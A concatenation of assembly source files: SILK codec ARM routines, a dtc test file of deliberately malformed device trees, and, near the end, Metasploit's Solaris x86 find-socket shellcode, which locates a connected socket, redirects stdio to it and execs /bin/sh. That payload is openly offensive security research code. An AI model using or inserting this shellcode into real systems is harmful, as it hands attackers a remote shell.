smlawt out2, S_4, xy0, out2
smlawb out1, S_4, xy0, out2
smlawt out, out1, xy1, out
sub S_5, out2, S_5
#if EMBEDDED_ARM<6
cmp out, #0x1000000
movge out, #0x1000000
subge out, out, #1
cmn out, #0x1000000
movlt out, #0x1000000
mov out, out, asr #9
#else
ssat out, #16, out, asr #9
#endif
str S_5, [S_ptr, #12] // S[5]
strh out, [r1], #2
ldmia S_ptr, {S_2, S_3}
sub xy0, in, S_2
smulwb xy0, xy0, up2_coefs
add out1, S_2, xy0
sub xy1, out1, S_3
smlawt xy1, xy1, up2_coefs, xy1
add out2, S_3, xy1
add S_2, in, xy0
add S_3, out1, xy1
stmia S_ptr!, {S_2, S_3}
ldmia S_ptr, {S_4, S_5}
ldr xy1, SYM(resampler_up2_hq_notch_2)
ldr xy0, SYM(resampler_up2_hq_notch_1)
mov out, #256
smlawb out2, S_4, xy1, out2
smlawt out2, S_5, xy0, out2
smlawb out1, S_5, xy0, out2
smlawt out, out1, xy1, out
sub S_4, out2, S_4
#if EMBEDDED_ARM<6
cmp out, #0x1000000
movge out, #0x1000000
subge out, out, #1
cmn out, #0x1000000
movlt out, #0x1000000
mov out, out, asr #9
#else
ssat out, #16, out, asr #9
#endif
subs r3, r3, #1
str S_4, [S_ptr], #-16 // &S[0]
strh out, [r1], #2
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
L(SYM(resampler_up2_hq_0))
DCD 0x83BF10B8
L(SYM(resampler_up2_hq_1))
DCD 0xD2FF3FA7
L(SYM(resampler_up2_hq_notch_1))
DCD 0xF1EC1EB8
L(SYM(resampler_up2_hq_notch_2))
DCD 0x6F5C3333
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 3,588 | silk/src/SKP_Silk_allpass_int_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM >= 5
VARDEF A, r2
VARDEF len, r4
VARDEF S00, r5
VARDEF ink1, r6
VARDEF ink2, r8
VARDEF Y2, sb
VARDEF outk1, sl
VARDEF outk2, ip
.globl SYM(SKP_Silk_allpass_int)
SYM(SKP_Silk_allpass_int):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
.set len_offset, 40
ldr len, [sp, #len_offset]
ldr S00, [r1]
movs A, A, lsl #17
sub len, len, #1
ldmia r0!, {ink1,ink2}
bge LR(1, f)/*AgeZero*/
L(0)
sub Y2, ink1, S00
smlawt outk1, Y2, A, ink1
add S00, Y2, outk1
subs len, len, #2
sub Y2, ink2, S00
smlawt outk2, Y2, A, ink2
#ifdef _WINRT
ble LR(3, f)
ldmia r0!, {ink1,ink2}
L(3)
#else
ldmgtia r0!, {ink1,ink2}
#endif
add S00, Y2, outk2
stmia r3!, {outk1, outk2}
bgt LR(0, b)
#ifdef _WINRT
bne LR(2, f)
ldr ink1, [r0], #4
sub Y2, ink1, S00
smlawt outk1, Y2, A, ink1
add S00, Y2, outk1
str outk1, [r3]
L(2)
#else
ldreq ink1, [r0], #4
subeq Y2, ink1, S00
smlawteq outk1, Y2, A, ink1
addeq S00, Y2, outk1
streq outk1, [r3]
#endif
str S00, [r1]
ldmia sp!, {r4-r10, fp, ip, pc}
L(1)/*AgeZero:*/
sub Y2, ink1, S00
smlawt outk1, Y2, A, S00
add S00, Y2, outk1
subs len, len, #2
sub Y2, ink2, S00
smlawt outk2, Y2, A, S00
#ifdef _WINRT
ble LR(3, f)
ldmia r0!, {ink1,ink2}
L(3)
#else
ldmgtia r0!, {ink1,ink2}
#endif
add S00, Y2, outk2
stmia r3!, {outk1, outk2}
bgt LR(1, b)
#ifdef _WINRT
bne LR(2, f)
ldr ink1, [r0], #4
sub Y2, ink1, S00
smlawt outk1, Y2, A, S00
add S00, Y2, outk1
str outk1, [r3]
L(2)
#else
ldreq ink1, [r0], #4
subeq Y2, ink1, S00
smlawteq outk1, Y2, A, S00
addeq S00, Y2, outk1
streq outk1, [r3]
#endif
str S00, [r1]
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 3,883 | silk/src/SKP_Silk_lin2log_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF val_lz, r1
VARDEF val_shift, r2
VARDEF val_frac, r3
VARDEF val_ret1, r1
VARDEF val_128minfrac, r2
VARDEF val_mul_ret, r0
VARDEF val_add_ret, r3
VARDEF const1, r1
.globl SYM(SKP_Silk_lin2log)
SYM(SKP_Silk_lin2log):
stmdb sp!, {r4-r5, fp, ip, lr}
add fp, sp, #16
clz val_lz, r0 /*lz*/
cmp val_lz, #24
sub val_shift, val_lz, #24
#ifdef _WINRT
bge LR(0, f)
rsb val_shift, val_lz, #24
mov val_frac, r0, asr val_shift
b LR(1, f)
L(0)
mov val_frac, r0, lsl val_shift
L(1)
#else
rsblt val_shift, val_lz, #24
movlt val_frac, r0, asr val_shift
movge val_frac, r0, lsl val_shift
#endif
and val_frac, val_frac, #0x7F /*frac_Q7*/
rsb val_ret1, val_lz, #31 /*31-lz*/
rsb val_128minfrac, val_frac, #128 /*128-frac_Q7*/
mov val_ret1, val_ret1, lsl #7
mul val_mul_ret, val_frac, val_128minfrac /*SKP_MUL(frac_Q7, 128 - frac_Q7)*/
add val_add_ret, val_ret1, val_frac
mov const1, #179
smlawb r0, val_mul_ret, const1, val_add_ret
ldmia sp!, {r4-r5, fp, ip, pc}
#elif EMBEDDED_ARM>=4
VARDEF val_lz, r0
VARDEF val_in, r4
VARDEF val_shift, r1
VARDEF val_frac, r2
VARDEF val_ret1, r1
VARDEF val_128minfrac, r3
VARDEF val_mul_ret, r3
VARDEF tmp0, r4
VARDEF const1, r2
VARDEF val_ret, r0
.globl SYM(SKP_Silk_lin2log)
SYM(SKP_Silk_lin2log):
stmdb sp!, {r4-r5, fp, ip, lr}
add fp, sp, #16
mov val_in, r0
bl SYM(SKP_Silk_CLZ32)
cmp val_lz, #24
sub val_shift, val_lz, #24
rsblt val_shift, val_lz, #24
movlt val_frac, val_in, asr val_shift
movge val_frac, val_in, lsl val_shift
and val_frac, val_frac, #0x7F /*frac_Q7*/
rsb val_ret1, val_lz, #31 /*31-lz*/
rsb val_128minfrac, val_frac, #128 /*128-frac_Q7*/
mov val_ret1, val_ret1, lsl #7
mul val_mul_ret, val_frac, val_128minfrac /*SKP_MUL(frac_Q7, 128 - frac_Q7)*/
add val_ret, val_ret1, val_frac
mov tmp0, #0
mov const1, #0xB30000
smlal tmp0, val_ret, val_mul_ret, const1
ldmia sp!, {r4-r5, fp, ip, pc}
#endif
END
#endif
|
open-vela/external_silk-v3-decoder | 3,256 | silk/src/SKP_Silk_clz_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if (EMBEDDED_ARM>0) && (EMBEDDED_ARM<5)
.globl SYM(SKP_Silk_CLZ16)
.globl SYM(SKP_Silk_CLZ32)
SYM(SKP_Silk_CLZ16):
str lr, [sp, #-4]!
mov r2, r0
mov r0, #0
ands r1, r2, #0xF000
movne r1, r2, asr #12
bne 0f
add r0, r0, #4
ands r1, r2, #0xF00
movne r1, r2, asr #8
bne 0f
add r0, r0, #4
ands r1, r2, #0xF0
movne r1, r2, asr #4
bne 0f
add r0, r0, #4
mov r1, r2
0:
ands r2, r1, #0x8
bne 1f
add r0, r0, #1
ands r2, r1, #0x4
bne 1f
add r0, r0, #1
ands r2, r1, #0x2
bne 1f
add r0, r0, #1
ands r2, r1, #0x1
bne 1f
add r0, r0, #1
1:
ldr pc, [sp], #4
SYM(SKP_Silk_CLZ32):
str lr, [sp, #-4]!
mov r2, r0
mov r0, #0
ands r1, r2, #0xF0000000
movne r1, r2, asr #28
bne 0f
add r0, r0, #4
ands r1, r2, #0xF000000
movne r1, r2, asr #24
bne 0f
add r0, r0, #4
ands r1, r2, #0xF00000
movne r1, r2, asr #20
bne 0f
add r0, r0, #4
ands r1, r2, #0xF0000
movne r1, r2, asr #16
bne 0f
add r0, r0, #4
ands r1, r2, #0xF000
movne r1, r2, asr #12
bne 0f
add r0, r0, #4
ands r1, r2, #0xF00
movne r1, r2, asr #8
bne 0f
add r0, r0, #4
ands r1, r2, #0xF0
movne r1, r2, asr #4
bne 0f
add r0, r0, #4
mov r1, r2
0:
ands r2, r1, #0x8
bne 1f
add r0, r0, #1
ands r2, r1, #0x4
bne 1f
add r0, r0, #1
ands r2, r1, #0x2
bne 1f
add r0, r0, #1
ands r2, r1, #0x1
bne 1f
add r0, r0, #1
1:
ldr pc, [sp], #4
#endif
#endif
|
open-vela/external_silk-v3-decoder | 6,467 | silk/src/SKP_Silk_resampler_private_down_FIR_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF out, r1
VARDEF ind, r2
VARDEF coef0, r3
VARDEF coef1, r4
VARDEF coef2, r5
#ifdef IPHONE
VARDEF val0, r6
VARDEF val1, r8
VARDEF val2, sb
VARDEF val3, _r7
#else
VARDEF val0, r6
VARDEF val1, _r7
VARDEF val2, r8
VARDEF val3, sb
#endif
VARDEF tmpptr, sl
VARDEF tmp0, ip
VARDEF tmp1, lr
.set sp_buf, 0
.set sp_maxi, 4
.globl SYM(SKP_Silk_resampler_private_down_FIR_INTERPOL0)
SYM(SKP_Silk_resampler_private_down_FIR_INTERPOL0):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #8
.set sp_inc, 48
cmp r3, #0
str r1, [sp, #sp_buf]
str r3, [sp, #sp_maxi]
ble LR(1, f)
ldrh r3, [r2], #2
ldrh r6, [r2], #2
ldrh r4, [r2], #2
ldrh _r7, [r2], #2
ldrh r5, [r2], #2
ldrh r8, [r2]
mov tmpptr, r1
add coef0, r3, r6, lsl #16
add coef1, r4, _r7, lsl #16
add coef2, r5, r8, lsl #16
ldmia tmpptr, {val0, val1}
add tmpptr, tmpptr, #40
ldr tmp0, [sp, #sp_inc]
ldmia tmpptr, {val2, val3}
mov ind, #0
L(0)
sub tmpptr, tmpptr, #32
add ind, ind, tmp0
add tmp0, val0, val3
add tmp1, val1, val2
ldmia tmpptr, {val0, val1}
add tmpptr, tmpptr, #24
ldmia tmpptr, {val2, val3}
smulwb out, tmp0, coef0
smlawt out, tmp1, coef0, out
sub tmpptr, tmpptr, #16
add tmp0, val0, val3
add tmp1, val1, val2
ldmia tmpptr, {val0, val1, val2, val3}
smlawb out, tmp0, coef1, out
smlawt out, tmp1, coef1, out
ldr tmpptr, [sp, #sp_buf]
add tmp0, val0, val3
add tmp1, val1, val2
smlawb out, tmp0, coef2, out
smlawt out, tmp1, coef2, out
mov tmp0, ind, asr #16
mov out, out, asr #5
add tmpptr, tmpptr, tmp0, lsl #2
add out, out, #1
cmp out, #0x10000
mov out, out, asr #1
ldr tmp1, [sp, #sp_maxi]
#ifdef _WINRT
ble LR(2, f)
mov out, #0x8000
L(2)
#else
movgt out, #0x8000
#endif
subge out, out, #1
cmn out, #0x8000
ldr tmp0, [sp, #sp_inc]
#ifdef _WINRT
bge LR(2, f)
mov out, #0x8000
L(2)
#else
movlt out, #0x8000
#endif
cmp ind, tmp1
#ifdef _WINRT
bge LR(2, f)
ldmia tmpptr, {val0, val1}
strh out, [r0], #2
add tmpptr, tmpptr, #40
ldmia tmpptr, {val2, val3}
b LR(0, b)
L(2)
strh out, [r0], #2
add tmpptr, tmpptr, #40
#else
ldmltia tmpptr, {val0, val1}
strh out, [r0], #2
add tmpptr, tmpptr, #40
ldmltia tmpptr, {val2, val3}
blt LR(0, b)
#endif
L(1)
add sp, sp, #8
ldmia sp!, {r4-r10, fp, ip, pc}
#ifdef IPHONE
VARDEF coefptr, _r7
VARDEF bufptr, sl
#else
VARDEF coefptr, sb
VARDEF bufptr, sl
#endif
.set sp_buf, 0
.set sp_coef, 4
.set sp_maxi, 8
.globl SYM(SKP_Silk_resampler_private_down_FIR_INTERPOL1)
SYM(SKP_Silk_resampler_private_down_FIR_INTERPOL1):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #12
.set sp_inc, 52
.set sp_fir_fracs, 56
cmp r3, #0
str r1, [sp, #sp_buf]
str r2, [sp, #sp_coef]
str r3, [sp, #sp_maxi]
blt LR(1, f)
mov tmp1, #0xFF00
mov ind, #0
add tmp1, tmp1, #0xFF
ldr coefptr, [sp, #sp_coef]
ldr bufptr, [sp, #sp_buf]
L(0)
ldr out, [sp, #sp_fir_fracs]
mov tmp0, ind, asr #16
add bufptr, bufptr, tmp0, lsl #2
and tmp1, ind, tmp1
smulwb tmp1, tmp1, out
ldmia bufptr!, {val0, val1, val2}
add coefptr, coefptr, tmp1, lsl #3
add coefptr, coefptr, tmp1, lsl #2
ldmia coefptr, {coef0, coef1, coef2}
sub tmp1, out, tmp1
ldr tmp0, [sp, #sp_inc]
ldr coefptr, [sp, #sp_coef]
smulwb out, val0, coef0
smlawt out, val1, coef0, out
smlawb out, val2, coef1, out
ldmia bufptr!, {val0, val1, val2}
sub tmp1, tmp1, #1
add ind, ind, tmp0
add coefptr, coefptr, tmp1, lsl #3
add coefptr, coefptr, tmp1, lsl #2
smlawt out, val0, coef1, out
smlawb out, val1, coef2, out
smlawt out, val2, coef2, out
ldmia coefptr, {coef0, coef1, coef2}
ldmia bufptr!, {val0, val1, val2}
ldr tmp0, [sp, #sp_maxi]
mov tmp1, #0xFF00
add tmp1, tmp1, #0xFF
smlawt out, val0, coef2, out
smlawb out, val1, coef2, out
smlawt out, val2, coef1, out
ldmia bufptr!, {val0, val1, val2}
ldr coefptr, [sp, #sp_coef]
ldr bufptr, [sp, #sp_buf]
smlawb out, val0, coef1, out
smlawt out, val1, coef0, out
smlawb out, val2, coef0, out
mov out, out, asr #5
add out, out, #1
cmp out, #0x10000
mov out, out, asr #1
#ifdef _WINRT
ble LR(2, f)
mov out, #0x8000
L(2)
#else
movgt out, #0x8000
#endif
subge out, out, #1
cmn out, #0x8000
#ifdef _WINRT
bge LR(2, f)
mov out, #0x8000
L(2)
#else
movlt out, #0x8000
#endif
cmp ind, tmp0
strh out, [r0], #2
blt LR(0, b)
L(1)
add sp, sp, #12
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/nuttx_libs_libc_fdt_dtc | 6,510 | tests/trees.S | #include <fdt.h>
#include "testdata.h"
.macro fdtlong val
.byte ((\val) >> 24) & 0xff
.byte ((\val) >> 16) & 0xff
.byte ((\val) >> 8) & 0xff
.byte (\val) & 0xff
.endm
.macro treehdr tree
.balign 8
.globl \tree
\tree :
fdtlong FDT_MAGIC
fdtlong (\tree\()_end - \tree)
fdtlong (\tree\()_struct - \tree)
fdtlong (\tree\()_strings - \tree)
fdtlong (\tree\()_rsvmap - \tree)
fdtlong 0x11
fdtlong 0x10
fdtlong 0
fdtlong (\tree\()_strings_end - \tree\()_strings)
fdtlong (\tree\()_struct_end - \tree\()_struct)
.endm
.macro rsvmape addrh, addrl, lenh, lenl
fdtlong \addrh
fdtlong \addrl
fdtlong \lenh
fdtlong \lenl
.endm
.macro empty_rsvmap tree
.balign 8
\tree\()_rsvmap:
rsvmape 0, 0, 0, 0
\tree\()_rsvmap_end:
.endm
.macro prophdr tree, name, len
fdtlong FDT_PROP
fdtlong \len
fdtlong (\tree\()_\name - \tree\()_strings)
.endm
.macro propnil tree, name
prophdr \tree, \name, 0
.endm
.macro propu32 tree, name, val
prophdr \tree, \name, 4
fdtlong \val
.endm
.macro propu64 tree, name, valh, vall
prophdr \tree, \name, 8
fdtlong \valh
fdtlong \vall
.endm
.macro propstr tree, name, str:vararg
prophdr \tree, \name, (55f - 54f)
54:
.asciz \str
55:
.balign 4
.endm
.macro beginn name:vararg
fdtlong FDT_BEGIN_NODE
.asciz \name
.balign 4
.endm
.macro endn
fdtlong FDT_END_NODE
.endm
.macro string tree, name, str:vararg
\tree\()_\name :
.asciz \str
.endm
.data
treehdr test_tree1
.balign 8
test_tree1_rsvmap:
rsvmape TEST_ADDR_1H, TEST_ADDR_1L, TEST_SIZE_1H, TEST_SIZE_1L
rsvmape TEST_ADDR_2H, TEST_ADDR_2L, TEST_SIZE_2H, TEST_SIZE_2L
rsvmape 0, 0, 0, 0
test_tree1_rsvmap_end:
test_tree1_struct:
beginn ""
propstr test_tree1, compatible, "test_tree1"
propu32 test_tree1, prop_int, TEST_VALUE_1
propu64 test_tree1, prop_int64, TEST_VALUE64_1H, TEST_VALUE64_1L
propstr test_tree1, prop_str, TEST_STRING_1
propu32 test_tree1, address_cells, 1
propu32 test_tree1, size_cells, 0
beginn "subnode@1"
propstr test_tree1, compatible, "subnode1"
propu32 test_tree1, reg, 1
propu32 test_tree1, prop_int, TEST_VALUE_1
beginn "subsubnode"
propstr test_tree1, compatible, "subsubnode1\0subsubnode"
propstr test_tree1, placeholder, "this is a placeholder string\0string2"
propu32 test_tree1, prop_int, TEST_VALUE_1
endn
beginn "ss1"
endn
endn
beginn "subnode@2"
propu32 test_tree1, reg, 2
propu32 test_tree1, linux_phandle, PHANDLE_1
propu32 test_tree1, prop_int, TEST_VALUE_2
propu32 test_tree1, address_cells, 1
propu32 test_tree1, size_cells, 0
beginn "subsubnode@0"
propu32 test_tree1, reg, 0
propu32 test_tree1, phandle, PHANDLE_2
propstr test_tree1, compatible, "subsubnode2\0subsubnode"
propu32 test_tree1, prop_int, TEST_VALUE_2
endn
beginn "ss2"
endn
endn
endn
fdtlong FDT_END
test_tree1_struct_end:
test_tree1_strings:
string test_tree1, compatible, "compatible"
string test_tree1, prop_int, "prop-int"
string test_tree1, prop_int64, "prop-int64"
string test_tree1, prop_str, "prop-str"
string test_tree1, linux_phandle, "linux,phandle"
string test_tree1, phandle, "phandle"
string test_tree1, reg, "reg"
string test_tree1, placeholder, "placeholder"
string test_tree1, address_cells, "#address-cells"
string test_tree1, size_cells, "#size-cells"
test_tree1_strings_end:
test_tree1_end:
treehdr truncated_property
empty_rsvmap truncated_property
truncated_property_struct:
beginn ""
prophdr truncated_property, prop_truncated, 4
/* Oops, no actual property data here */
truncated_property_struct_end:
truncated_property_strings:
string truncated_property, prop_truncated, "truncated"
truncated_property_strings_end:
truncated_property_end:
treehdr bad_node_char
empty_rsvmap bad_node_char
bad_node_char_struct:
beginn ""
beginn "sub$node"
endn
endn
fdtlong FDT_END
bad_node_char_struct_end:
bad_node_char_strings:
bad_node_char_strings_end:
bad_node_char_end:
treehdr bad_node_format
empty_rsvmap bad_node_format
bad_node_format_struct:
beginn ""
beginn "subnode@1@2"
endn
endn
fdtlong FDT_END
bad_node_format_struct_end:
bad_node_format_strings:
bad_node_format_strings_end:
bad_node_format_end:
treehdr bad_prop_char
empty_rsvmap bad_prop_char
bad_prop_char_struct:
beginn ""
propu32 bad_prop_char, prop, TEST_VALUE_1
endn
fdtlong FDT_END
bad_prop_char_struct_end:
bad_prop_char_strings:
string bad_prop_char, prop, "prop$erty"
bad_prop_char_strings_end:
bad_prop_char_end:
/* overflow_size_strings */
.balign 8
.globl ovf_size_strings
ovf_size_strings:
fdtlong FDT_MAGIC
fdtlong (ovf_size_strings_end - ovf_size_strings)
fdtlong (ovf_size_strings_struct - ovf_size_strings)
fdtlong (ovf_size_strings_strings - ovf_size_strings)
fdtlong (ovf_size_strings_rsvmap - ovf_size_strings)
fdtlong 0x11
fdtlong 0x10
fdtlong 0
fdtlong 0xffffffff
fdtlong (ovf_size_strings_struct_end - ovf_size_strings_struct)
empty_rsvmap ovf_size_strings
ovf_size_strings_struct:
beginn ""
propu32 ovf_size_strings, bad_string, 0
endn
fdtlong FDT_END
ovf_size_strings_struct_end:
ovf_size_strings_strings:
string ovf_size_strings, x, "x"
ovf_size_strings_bad_string = ovf_size_strings_strings + 0x10000000
ovf_size_strings_strings_end:
ovf_size_strings_end:
/* truncated_string */
treehdr truncated_string
empty_rsvmap truncated_string
truncated_string_struct:
beginn ""
propnil truncated_string, good_string
propnil truncated_string, bad_string
endn
fdtlong FDT_END
truncated_string_struct_end:
truncated_string_strings:
string truncated_string, good_string, "good"
truncated_string_bad_string:
.ascii "bad"
/* NOTE: terminating \0 deliberately missing */
truncated_string_strings_end:
truncated_string_end:
/* truncated_memrsv */
treehdr truncated_memrsv
truncated_memrsv_struct:
beginn ""
endn
fdtlong FDT_END
truncated_memrsv_struct_end:
truncated_memrsv_strings:
truncated_memrsv_strings_end:
.balign 8
truncated_memrsv_rsvmap:
rsvmape TEST_ADDR_1H, TEST_ADDR_1L, TEST_SIZE_1H, TEST_SIZE_1L
truncated_memrsv_rsvmap_end:
truncated_memrsv_end:
/* two root nodes */
treehdr two_roots
empty_rsvmap two_roots
two_roots_struct:
beginn ""
endn
beginn ""
endn
fdtlong FDT_END
two_roots_struct_end:
two_roots_strings:
two_roots_strings_end:
two_roots_end:
/* root node with a non-empty name */
treehdr named_root
empty_rsvmap named_root
named_root_struct:
beginn "fake"
endn
fdtlong FDT_END
named_root_struct_end:
named_root_strings:
named_root_strings_end:
named_root_end:
|
OpenWireSec/metasploit | 1,873 | external/source/unixasm/sol-x86-fndsockcode.s | /*
* sol-x86-fndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 86 bytes
fndsockcode_part1:
xorl %ebx,%ebx
mull %ebx
pushl %ebx
movl %esp,%edi
syscallcode:
pushl $0x3cffd8ff
pushl $0x65
movl %esp,%esi
notl 0x04(%esi)
notb (%esi)
fndsockcode_part2:
pushl %edi
movb $0x91,%bl
pushl %ebx
pushl %ebx
pushl %esp
movb $0x54,%bh
pushl %ebx
pushl %eax
0:
popl %eax
incl %eax
pushl %eax
pushl $0x36
popl %eax
call *%esi
cmpw $0xd204,0x02(%edi)
jne 0b
popl %eax
pushl %eax
pushl $0x09
pushl %eax
1:
pushl $0x3e
popl %eax
call *%esi
decl -0x20(%edi)
jns 1b
shellcode:
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
pushl %eax
pushl %ecx
pushl %ebx
movb $0x3b,%al
call *%esi
|
OpenWireSec/metasploit | 2,737 | external/source/unixasm/aix-power-cntsockcode.S | /*
* aix-power-cntsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
